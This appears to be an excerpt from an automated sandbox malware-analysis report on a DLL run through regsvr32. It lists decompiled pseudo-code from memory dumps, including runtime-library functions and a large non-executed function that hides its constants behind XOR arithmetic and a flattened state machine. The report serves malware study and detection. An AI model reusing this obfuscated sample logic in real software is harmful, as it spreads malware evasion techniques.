			E6DA63F8D(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x6da85fbc = _t6;
				if(_t6 != 0) {
					 *0x6da8783c = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x6da63fa2
0x6da63fa8
0x6da63faf
0x6da63fb6
0x6da63fbc
0x6da63fb2
0x6da63fb2
0x6da63fb2

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,?,6DA5ACDA,00000001,?,?,?,6DA5AE53,?,?,?,6DA7E9F0,0000000C,6DA5AF0E), ref: 6DA63FA2

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 30502498e58780c97a1f89564865ea3d46ac98df9ed3d14cb55ea17b4fb94848
Instruction ID: f594555b986b6cb948a4df11501d64fa94592c8e3d8fa7337cdd6b38707f5745
Opcode Fuzzy Hash: 30502498e58780c97a1f89564865ea3d46ac98df9ed3d14cb55ea17b4fb94848
Instruction Fuzzy Hash: A2D05E76A9C3459FDB005E769C087267BFC9386396F04C436BC4EC6180E770C582CE44

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5D3DD Relevance: 1.5, APIs: 1, Instructions: 6
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E6DA5D3DD() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E6DA5D29B(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x6da5d3dd
0x6da5d3df
0x6da5d3e1
0x6da5d3e3
0x6da5d3eb

APIs

_doexit.LIBCMT ref: 6DA5D3E3

Part of subcall function 6DA5D29B: __lock.LIBCMT ref: 6DA5D2A9
Part of subcall function 6DA5D29B: __decode_pointer.LIBCMT ref: 6DA5D2E0
Part of subcall function 6DA5D29B: __decode_pointer.LIBCMT ref: 6DA5D2F5
Part of subcall function 6DA5D29B: __decode_pointer.LIBCMT ref: 6DA5D31F
Part of subcall function 6DA5D29B: __decode_pointer.LIBCMT ref: 6DA5D335
Part of subcall function 6DA5D29B: __decode_pointer.LIBCMT ref: 6DA5D342
Part of subcall function 6DA5D29B: __initterm.LIBCMT ref: 6DA5D371
Part of subcall function 6DA5D29B: __initterm.LIBCMT ref: 6DA5D381

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
Instruction ID: c02104e0f7ff9fc276206d111736fd73408553409746cc0c5231beb43bf9dfd9
Opcode Fuzzy Hash: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
Instruction Fuzzy Hash: 0AA002B5BDC30021FC6052502D83F9822012791F46FD50050BB086C1C4B5E652E88057

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5F473 Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA5F473() {
				void* _t1;

				_t1 = E6DA5F401(0); // executed
				return _t1;
			}

0x6da5f475
0x6da5f47b

APIs

__encode_pointer.LIBCMT ref: 6DA5F475

Part of subcall function 6DA5F401: TlsGetValue.KERNEL32 ref: 6DA5F413
Part of subcall function 6DA5F401: TlsGetValue.KERNEL32 ref: 6DA5F42A
Part of subcall function 6DA5F401: RtlEncodePointer.NTDLL(00000000,?,6DA5F47A,00000000,6DA697C9,6DA86118,00000000,00000314,?,6DA64E13,6DA86118,Microsoft Visual C++ Runtime Library,00012010), ref: 6DA5F468

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 989db98609b1bbbf3282ead17d33657b78c32125fd4728bc57965d2e77af61fa
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DA2A5E0 Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA2A5E0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}

0x6da2a5ef
0x6da2a5f6

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 6DA2A5EF

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: fc57a61e20872b235eba51420a1a16104b708a310afceff2d29adf3622873b08
Instruction ID: ae94b4284339b56a1ccda03e24b39caef978cc81ed369cc5906d67af1f1b3f13
Opcode Fuzzy Hash: fc57a61e20872b235eba51420a1a16104b708a310afceff2d29adf3622873b08
Instruction Fuzzy Hash: D0C04C7611434CFB8B04DF98D884DEB37BDAB8D611B00C948BA1DC7200D731F9518BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10007786 Relevance: 28.2, Strings: 22, Instructions: 713
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E10007786(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				void* _t815;
				void* _t828;
				intOrPtr _t830;
				void* _t833;
				void* _t845;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				void* _t872;
				signed int _t885;
				void* _t893;
				void* _t948;
				signed int _t954;
				intOrPtr* _t967;
				signed int _t969;
				void* _t970;
				void* _t971;
				void* _t973;
				signed int* _t974;
				void* _t982;

				_t974 =  &_v420;
				_t967 = __ecx;
				_v84 = __ecx;
				_v284 = 0x10d879;
				_v284 = _v284 ^ 0x0b447925;
				_v284 = _v284 ^ 0x5f7873a3;
				_v284 = _v284 ^ 0x542cd2ff;
				_v144 = 0xd3b69;
				_v144 = _v144 >> 4;
				_v144 = _v144 ^ 0x0000d3b6;
				_v408 = 0xae1200;
				_v408 = _v408 + 0xffff24f4;
				_v408 = _v408 | 0x6cb94cec;
				_v408 = _v408 >> 0x10;
				_v408 = _v408 ^ 0x00006cbd;
				_v184 = 0x54d8b6;
				_v184 = _v184 + 0xffff3b80;
				_v184 = _v184 ^ 0x00541436;
				_v160 = 0x3898bc;
				_v160 = _v160 | 0xa4014f0f;
				_v160 = _v160 ^ 0xa439dfbf;
				_v312 = 0xba6da5;
				_v312 = _v312 * 0x24;
				_t973 = 0;
				_t852 = 0xd;
				_v312 = _v312 / _t852;
				_v312 = _v312 + 0x7bd4;
				_t845 = 0xdd11c45;
				_v312 = _v312 ^ 0x0204bf26;
				_v364 = 0x4c57eb;
				_v364 = _v364 << 0xb;
				_t853 = 0x5b;
				_v364 = _v364 / _t853;
				_v364 = _v364 + 0xf8ba;
				_v364 = _v364 ^ 0x0116c43e;
				_v356 = 0xd80401;
				_t854 = 0x42;
				_v356 = _v356 / _t854;
				_v356 = _v356 + 0xffffd46a;
				_v356 = _v356 + 0xffffa12d;
				_v356 = _v356 ^ 0x0002bb77;
				_v216 = 0x3e87b8;
				_v216 = _v216 << 9;
				_v216 = _v216 ^ 0x91abc2ed;
				_v216 = _v216 ^ 0xeca4b2ed;
				_v272 = 0xf1e89e;
				_v272 = _v272 + 0x8ee7;
				_v272 = _v272 + 0xcd5;
				_v272 = _v272 ^ 0x00f2845a;
				_v400 = 0xb88d35;
				_v400 = _v400 | 0x8777ff75;
				_v400 = _v400 + 0xffffa780;
				_v400 = _v400 ^ 0x87ffa6f5;
				_v324 = 0xdb7396;
				_v324 = _v324 << 5;
				_v324 = _v324 >> 7;
				_v324 = _v324 ^ 0x708486b8;
				_v324 = _v324 ^ 0x70b25a5d;
				_v336 = 0x12c504;
				_v336 = _v336 ^ 0xb5d9015f;
				_v336 = _v336 | 0xb4fbbfb2;
				_v336 = _v336 ^ 0xb5f1ef00;
				_v368 = 0x7fcf48;
				_v368 = _v368 * 0x5e;
				_v368 = _v368 + 0x4715;
				_t855 = 0x2a;
				_v368 = _v368 / _t855;
				_v368 = _v368 ^ 0x0114d232;
				_v152 = 0x69c5ef;
				_v152 = _v152 + 0xd2a5;
				_v152 = _v152 ^ 0x00663f5c;
				_v132 = 0x684d5b;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x342ab974;
				_v412 = 0xfdd928;
				_v412 = _v412 + 0x9b12;
				_v412 = _v412 | 0xff9fbe7e;
				_v412 = _v412 ^ 0xfff69653;
				_v420 = 0xa6465e;
				_v420 = _v420 ^ 0xbc8e0803;
				_t856 = 0x12;
				_v420 = _v420 / _t856;
				_v420 = _v420 ^ 0x6b558d1e;
				_v420 = _v420 ^ 0x612e6cb5;
				_v304 = 0x9ef863;
				_t857 = 0x1c;
				_v304 = _v304 / _t857;
				_v304 = _v304 | 0x9a54933b;
				_v304 = _v304 ^ 0x9a50a84e;
				_v248 = 0x53743a;
				_v248 = _v248 + 0xffffbdd7;
				_v248 = _v248 << 0xf;
				_v248 = _v248 ^ 0x990dcb2b;
				_v404 = 0x1936ec;
				_v404 = _v404 + 0xffff8eaa;
				_v404 = _v404 + 0xffffeb14;
				_v404 = _v404 >> 6;
				_v404 = _v404 ^ 0x000ebf47;
				_v292 = 0x8270fc;
				_v292 = _v292 >> 8;
				_v292 = _v292 << 9;
				_v292 = _v292 ^ 0x010224cd;
				_v124 = 0xf9b514;
				_t969 = 0x1d;
				_v124 = _v124 / _t969;
				_v124 = _v124 ^ 0x0009cdfd;
				_v276 = 0x84a487;
				_v276 = _v276 << 0xa;
				_t858 = 0x55;
				_v276 = _v276 / _t858;
				_v276 = _v276 ^ 0x00350918;
				_v116 = 0xa641a3;
				_v116 = _v116 >> 9;
				_v116 = _v116 ^ 0x0000f176;
				_v396 = 0xe3379;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xc095d4f7;
				_v396 = _v396 + 0xffff44fe;
				_v396 = _v396 ^ 0xc09ceb78;
				_v380 = 0xa1123;
				_t859 = 0x24;
				_v380 = _v380 / _t859;
				_t860 = 6;
				_v380 = _v380 * 0x7b;
				_v380 = _v380 | 0xae71e2a4;
				_v380 = _v380 ^ 0xae732eb4;
				_v268 = 0xe2a08e;
				_v268 = _v268 * 0x58;
				_v268 = _v268 | 0x7031e53e;
				_v268 = _v268 ^ 0x7df9bf6b;
				_v388 = 0x7f3fbb;
				_v388 = _v388 << 2;
				_v388 = _v388 / _t860;
				_v388 = _v388 | 0x8169e357;
				_v388 = _v388 ^ 0x817751cb;
				_v360 = 0x210894;
				_t861 = 0x51;
				_v360 = _v360 / _t861;
				_v360 = _v360 | 0xfb7dedfd;
				_v360 = _v360 ^ 0xfb79f9e8;
				_v300 = 0x175816;
				_v300 = _v300 ^ 0x60e9afb5;
				_v300 = _v300 >> 4;
				_v300 = _v300 ^ 0x060cc159;
				_v416 = 0x57148b;
				_v416 = _v416 | 0x05b46436;
				_v416 = _v416 + 0xffff993d;
				_v416 = _v416 ^ 0xee6826e0;
				_v416 = _v416 ^ 0xeb9eb790;
				_v224 = 0x1f2913;
				_v224 = _v224 << 0xd;
				_v224 = _v224 >> 6;
				_v224 = _v224 ^ 0x039981c2;
				_v256 = 0x944b1e;
				_v256 = _v256 << 0x10;
				_t862 = 0x54;
				_v256 = _v256 * 0x64;
				_v256 = _v256 ^ 0x57b855b5;
				_v372 = 0x5652a4;
				_v372 = _v372 << 2;
				_v372 = _v372 * 0x2d;
				_v372 = _v372 ^ 0xf5fc8c50;
				_v372 = _v372 ^ 0xc946a80e;
				_v108 = 0xdfbedb;
				_v108 = _v108 << 6;
				_v108 = _v108 ^ 0x37e8787c;
				_v136 = 0x5ef9ce;
				_v136 = _v136 >> 4;
				_v136 = _v136 ^ 0x00009477;
				_v260 = 0x65eb8;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 << 7;
				_v260 = _v260 ^ 0x0002e47d;
				_v228 = 0xaea2d1;
				_v228 = _v228 << 4;
				_v228 = _v228 / _t862;
				_v228 = _v228 ^ 0x0022e3d8;
				_v236 = 0xaa2c5e;
				_v236 = _v236 ^ 0xff516110;
				_v236 = _v236 ^ 0xda5bb4ee;
				_v236 = _v236 ^ 0x25a70e57;
				_v188 = 0xff0a94;
				_v188 = _v188 + 0x2deb;
				_v188 = _v188 ^ 0x00f22310;
				_v244 = 0xcd4fbe;
				_v244 = _v244 >> 7;
				_t863 = 0xd;
				_v244 = _v244 * 0x3b;
				_v244 = _v244 ^ 0x00554248;
				_v252 = 0xd747b9;
				_v252 = _v252 << 4;
				_v252 = _v252 << 5;
				_v252 = _v252 ^ 0xae889f61;
				_v172 = 0xa00303;
				_v172 = _v172 | 0xbaaced29;
				_v172 = _v172 ^ 0xbaad9e86;
				_v348 = 0x970648;
				_v348 = _v348 | 0xfb9fbefa;
				_v348 = _v348 + 0xe7c6;
				_v348 = _v348 ^ 0xfba760e0;
				_v180 = 0xb28d47;
				_v180 = _v180 ^ 0xf32eb041;
				_v180 = _v180 ^ 0xf3944ea2;
				_v156 = 0x2b1054;
				_v156 = _v156 ^ 0x40829eee;
				_v156 = _v156 ^ 0x40a6a871;
				_v164 = 0x3f645f;
				_v164 = _v164 | 0xc1bd4876;
				_v164 = _v164 ^ 0xc1b13823;
				_v220 = 0x355808;
				_v220 = _v220 + 0xffff77d8;
				_v220 = _v220 * 0x1e;
				_v220 = _v220 ^ 0x063beaa3;
				_v208 = 0xfe5e2d;
				_v208 = _v208 / _t863;
				_v208 = _v208 >> 6;
				_v208 = _v208 ^ 0x0009703a;
				_v296 = 0x8eb77f;
				_t864 = 0x23;
				_v296 = _v296 / _t969;
				_v296 = _v296 + 0x28d0;
				_v296 = _v296 ^ 0x000e3c3b;
				_v176 = 0x7b38eb;
				_v176 = _v176 + 0xffffb0b3;
				_v176 = _v176 ^ 0x00706093;
				_v392 = 0x5e4110;
				_v392 = _v392 + 0x511;
				_v392 = _v392 >> 4;
				_v392 = _v392 / _t864;
				_v392 = _v392 ^ 0x00069876;
				_v112 = 0xfbcf64;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x007cbb1e;
				_v384 = 0x16810b;
				_v384 = _v384 + 0x8b33;
				_v384 = _v384 + 0x4a34;
				_v384 = _v384 ^ 0xa33fd27c;
				_v384 = _v384 ^ 0xa32238b1;
				_v328 = 0xfea2d0;
				_v328 = _v328 + 0xffff07f8;
				_t865 = 0x79;
				_v328 = _v328 * 0x5f;
				_t866 = 0x18;
				_v328 = _v328 / _t865;
				_v328 = _v328 ^ 0x00c5f200;
				_v280 = 0x74b862;
				_v280 = _v280 / _t866;
				_v280 = _v280 << 0xd;
				_v280 = _v280 ^ 0x9bad20d6;
				_v240 = 0x36e04f;
				_t867 = 0x45;
				_v240 = _v240 * 0xb;
				_v240 = _v240 ^ 0xf8676d28;
				_v240 = _v240 ^ 0xfa3a8061;
				_v288 = 0x1beeb6;
				_v288 = _v288 + 0xdc90;
				_v288 = _v288 | 0xa8d7798b;
				_v288 = _v288 ^ 0xa8d16903;
				_v264 = 0x95241d;
				_v264 = _v264 + 0xffff2c56;
				_v264 = _v264 * 0x79;
				_v264 = _v264 ^ 0x46123619;
				_v232 = 0xfe0004;
				_v232 = _v232 | 0xaee8c645;
				_v232 = _v232 + 0x9767;
				_v232 = _v232 ^ 0xaefd28ca;
				_v168 = 0xd8fdbd;
				_v168 = _v168 << 0xa;
				_v168 = _v168 ^ 0x63fcbe89;
				_v128 = 0x353b0d;
				_v128 = _v128 + 0xffff6331;
				_v128 = _v128 ^ 0x0031e41c;
				_v352 = 0x16001;
				_v352 = _v352 << 9;
				_v352 = _v352 * 0x1d;
				_v352 = _v352 / _t867;
				_v352 = _v352 ^ 0x01286f7c;
				_v192 = 0x623f00;
				_v192 = _v192 >> 0x10;
				_v192 = _v192 ^ 0x000b9b55;
				_v320 = 0x7af827;
				_v320 = _v320 ^ 0x35cd3431;
				_t868 = 0xd;
				_v320 = _v320 * 0x71;
				_v320 = _v320 ^ 0x3edcff4b;
				_v320 = _v320 ^ 0x88f7fd42;
				_v140 = 0x941be2;
				_v140 = _v140 + 0xffff3420;
				_v140 = _v140 ^ 0x009e4c7a;
				_v148 = 0xbd1d91;
				_v148 = _v148 << 4;
				_v148 = _v148 ^ 0x0bd00b22;
				_v332 = 0x4ec7bc;
				_v332 = _v332 ^ 0xa8c2ef86;
				_v332 = _v332 | 0xdeff8fbf;
				_v332 = _v332 ^ 0xfefd8ca1;
				_v204 = 0xc2e89;
				_v204 = _v204 + 0xffff52f5;
				_v204 = _v204 + 0xffff75a4;
				_v204 = _v204 ^ 0x00054ad7;
				_v340 = 0x291e0e;
				_v340 = _v340 * 0x38;
				_v340 = _v340 * 0x7d;
				_v340 = _v340 / _t868;
				_v340 = _v340 ^ 0x07be3344;
				_v212 = 0x5decd5;
				_v212 = _v212 + 0xffff1af9;
				_v212 = _v212 + 0xffff808a;
				_v212 = _v212 ^ 0x00562741;
				_v376 = 0x217ae1;
				_v376 = _v376 + 0x8cb4;
				_v376 = _v376 ^ 0x7f2f61ce;
				_v376 = _v376 + 0x5386;
				_v376 = _v376 ^ 0x7f0b326f;
				_t970 = 0x2213aef;
				_v120 = 0xdaec88;
				_v120 = _v120 | 0xab14a88e;
				_v120 = _v120 ^ 0xabda6160;
				_v344 = 0xbdf3d2;
				_v344 = _v344 ^ 0xa98b9aa7;
				_v344 = _v344 + 0xffff766b;
				_t869 = 0x1f;
				_v344 = _v344 / _t869;
				_v344 = _v344 ^ 0x0574913b;
				_v200 = 0x431d1e;
				_v200 = _v200 | 0x0f6756b1;
				_v200 = _v200 + 0xffff56f0;
				_v200 = _v200 ^ 0x0f696507;
				_v308 = 0xb0e7e0;
				_v308 = _v308 << 8;
				_v308 = _v308 << 2;
				_v308 = _v308 | 0x3872646b;
				_v308 = _v308 ^ 0xfbfd3125;
				_v316 = 0xce7912;
				_v316 = _v316 + 0xa781;
				_v316 = _v316 | 0x012c68d7;
				_t870 = 0x6b;
				_v316 = _v316 / _t870;
				_v316 = _v316 ^ 0x0008f2f6;
				_v196 = 0xd9676d;
				_t871 = 0x39;
				_v80 = 0x48;
				_v196 = _v196 * 0x7e;
				_t872 = 0x46d8198;
				_v196 = _v196 / _t871;
				_v196 = _v196 ^ 0x01e83dc3;
				while(1) {
					L1:
					while(1) {
						_t948 = 0x7a2a4cb;
						do {
							L3:
							_t982 = _t845 - 0xb0e9adb;
							if(_t982 > 0) {
								if(_t845 == 0xdd11c45) {
									_t845 = 0xf04d6fd;
									goto L34;
								} else {
									if(_t845 == 0xe022f5b) {
										E1000F36A(_v332, _v204, _v340, _v96, _v212);
										_t974 =  &(_t974[3]);
										_t845 = 0x5d10782;
										goto L13;
									} else {
										if(_t845 == 0xe3949de) {
											E1001677F(_v92, _v140, _v148);
											_t845 = 0xe022f5b;
											goto L13;
										} else {
											if(_t845 == _t815) {
												_push(_v260);
												_push(_v136);
												_push(_v108);
												_t971 = E10004BB4(0x100015b8, _v372);
												_v88 = _v80;
												_t828 = E10004D7D(_v80, _t971, _v104, _v228,  &_v76, _v236, _v188, _v364, _v244, _v252, _v80,  &_v88);
												_t974 =  &(_t974[0xd]);
												if(_t828 != _v356) {
													_t845 = 0x5d10782;
												} else {
													_push( &_v68);
													_t830 =  *0x1002420c; // 0x0
													_push(_t830 + 8);
													_push(_v180);
													_push(_v348);
													_t893 = 0x40;
													E10011D1C(_t893, _v172);
													_t974 =  &(_t974[4]);
													_t845 = 0x6a948c9;
												}
												_push(_v220);
												_t954 = _v164;
												_t885 = _v156;
												goto L29;
											} else {
												if(_t845 == 0xf04d6fd) {
													_push(_v132);
													_push(_v152);
													_push(_v368);
													_t833 = E10004BB4(0x100016e8, _v336);
													_push(_v248);
													_push(_v304);
													_push(_v420);
													E1000D68B(E10004BB4(0x100015e8, _v412), _v404, _v284, _t833, _v292,  &_v100, _v124);
													_t845 =  ==  ? 0x95d2264 : 0x208d833;
													E1000B9D7(_v276, _v116, _t833, _v396);
													E1000B9D7(_v380, _v268, _t834, _v388);
													_t967 = _v84;
													_t974 =  &(_t974[0xf]);
													goto L30;
												}
											}
											goto L34;
										}
									}
								}
							} else {
								if(_t982 == 0) {
									E1000D5CB(_v308, _v100, _v316, _v324, _v196);
								} else {
									if(_t845 == _t970) {
										E10017473(_v92);
										_t845 = 0xe3949de;
										_t973 =  !=  ? 1 : _t973;
										goto L13;
									} else {
										if(_t845 == _t872) {
											E1000FD9D(_v224, _v160, _v256, _v104);
											_t815 = 0xeff08de;
											_t845 =  ==  ? 0xeff08de : 0x5d10782;
											goto L14;
										} else {
											if(_t845 == 0x5d10782) {
												E1000F36A(_v376, _v120, _v344, _v104, _v200);
												_t974 =  &(_t974[3]);
												_t845 = 0xb0e9adb;
												goto L13;
											} else {
												if(_t845 == 0x6a948c9) {
													_push(_v392);
													_push(_v176);
													_push(_v296);
													_t971 = E10004BB4(0x100015b8, _v208);
													E1000B40A(_v216, _v112, 0x100015b8, _v384, _v328, _v280,  *_t967, _v240,  &_v96, _v288,  *((intOrPtr*)(_t967 + 4)), _v100, _t971);
													_t974 =  &(_t974[0xe]);
													_push(_v168);
													_t954 = _v232;
													_t845 =  ==  ? 0x7a2a4cb : 0x5d10782;
													_t885 = _v264;
													L29:
													_push(_t971);
													E1000B9D7(_t885, _t954);
													L30:
													_t970 = 0x2213aef;
													_t815 = 0xeff08de;
													_t872 = 0x46d8198;
													_t948 = 0x7a2a4cb;
													goto L34;
												} else {
													if(_t845 == _t948) {
														E1000BD30(_v128,  &_v92, _v352, _v400, _v192, _v96, _v104, _v320);
														_t974 =  &(_t974[6]);
														_t845 =  ==  ? _t970 : 0xe022f5b;
														L13:
														L14:
														_t872 = 0x46d8198;
														_t948 = 0x7a2a4cb;
														continue;
													} else {
														if(_t845 != 0x95d2264) {
															goto L34;
														} else {
															_v88 = 0x100;
															E10009F58(_v408, 0x100, _v360, _v300, _v416, _v100,  &_v104);
															_t974 =  &(_t974[5]);
															_t872 = 0x46d8198;
															_t845 =  ==  ? 0x46d8198 : 0xb0e9adb;
															goto L1;
														}
													}
												}
											}
										}
									}
								}
							}
							L37:
							return _t973;
							L34:
						} while (_t845 != 0x208d833);
						goto L37;
					}
				}
			}

0x10007786
0x10007790
0x10007792
0x10007799
0x100077a6
0x100077b1
0x100077bc
0x100077c7
0x100077d2
0x100077da
0x100077e5
0x100077ed
0x100077f5
0x100077fd
0x10007802
0x1000780a
0x10007815
0x10007820
0x1000782b
0x10007836
0x10007841
0x1000784c
0x10007859
0x10007861
0x10007865
0x1000786a
0x10007873
0x1000787e
0x10007883
0x1000788e
0x10007896
0x1000789f
0x100078a4
0x100078aa
0x100078b2
0x100078ba
0x100078c6
0x100078c9
0x100078cd
0x100078d5
0x100078dd
0x100078e5
0x100078f0
0x100078f8
0x10007903
0x1000790e
0x10007919
0x10007924
0x1000792f
0x1000793a
0x10007942
0x1000794a
0x10007952
0x1000795a
0x10007962
0x10007967
0x1000796c
0x10007974
0x1000797c
0x10007984
0x1000798c
0x10007994
0x1000799c
0x100079a9
0x100079ad
0x100079bd
0x100079c2
0x100079c8
0x100079d0
0x100079db
0x100079e6
0x100079f1
0x100079fc
0x10007a04
0x10007a0f
0x10007a17
0x10007a1f
0x10007a27
0x10007a2f
0x10007a37
0x10007a43
0x10007a48
0x10007a4e
0x10007a56
0x10007a5e
0x10007a70
0x10007a75
0x10007a7e
0x10007a89
0x10007a94
0x10007a9f
0x10007aaa
0x10007ab2
0x10007abd
0x10007ac5
0x10007acd
0x10007ad5
0x10007ada
0x10007ae2
0x10007aed
0x10007af5
0x10007afd
0x10007b08
0x10007b1a
0x10007b1f
0x10007b28
0x10007b33
0x10007b3e
0x10007b4d
0x10007b52
0x10007b5b
0x10007b66
0x10007b71
0x10007b79
0x10007b84
0x10007b8c
0x10007b91
0x10007b99
0x10007ba1
0x10007ba9
0x10007bb5
0x10007bb8
0x10007bc5
0x10007bc8
0x10007bcc
0x10007bd4
0x10007bdc
0x10007bef
0x10007bf6
0x10007c01
0x10007c0c
0x10007c14
0x10007c21
0x10007c25
0x10007c2d
0x10007c35
0x10007c41
0x10007c46
0x10007c4c
0x10007c54
0x10007c5c
0x10007c67
0x10007c72
0x10007c7a
0x10007c85
0x10007c8d
0x10007c95
0x10007c9d
0x10007ca5
0x10007cad
0x10007cb8
0x10007cc0
0x10007cc8
0x10007cd3
0x10007cde
0x10007cee
0x10007cef
0x10007cf6
0x10007d01
0x10007d09
0x10007d13
0x10007d17
0x10007d1f
0x10007d27
0x10007d32
0x10007d3a
0x10007d45
0x10007d50
0x10007d58
0x10007d63
0x10007d6e
0x10007d76
0x10007d7e
0x10007d89
0x10007d94
0x10007da5
0x10007dac
0x10007db7
0x10007dc2
0x10007dcd
0x10007dd8
0x10007de3
0x10007dee
0x10007df9
0x10007e04
0x10007e0f
0x10007e23
0x10007e26
0x10007e2d
0x10007e38
0x10007e43
0x10007e4b
0x10007e53
0x10007e5e
